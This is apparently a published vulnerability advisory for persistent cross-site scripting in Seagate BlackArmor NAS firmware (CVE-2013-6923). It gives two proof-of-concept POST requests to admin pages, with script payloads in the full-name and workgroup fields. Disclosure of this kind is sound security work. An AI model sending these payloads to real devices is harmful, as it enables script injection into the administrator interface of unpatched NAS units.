# Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site Scripting Vulnerabilities # Google Dork: N/A # Date: 04-01-2014 # Exploit Author: Jeroen - IT Nerdbox # Vendor Homepage: <http://www.seagate.com/> http://www.seagate.com/ # Software Link: <http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/> http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/ # Version: sg2000-2000.1331 # Tested on: N/A # CVE : CVE-2013-6923 # ## Description: # # When adding a user to the device, it is possible to enter a full name. This input field does not # sanitize its input and it is possible to enter any payload which will get executed upon reload. # # The workgroup configuration is also vulnerable to persistent XSS. The Work Group name input # field does not sanitize its input. # # This vulnerability was reported to Seagate in September 2013, they stated that this will not be fixed. # ## Proof of Concept #1: # # POST: http(s)://<url | ip>/admin/access_control_user_edit.php?id=2&lang=en # Parameters: # # index = 2 # fullname = <script>alert(1);</script> # submit = Submit # # ## Proof of Concept #2: # # POST: http(s)://<url | ip>/admin/network_workgroup_domain.php?lang=en&gi=n003 # Parameter: # # workname = "><input onmouseover=prompt(1) >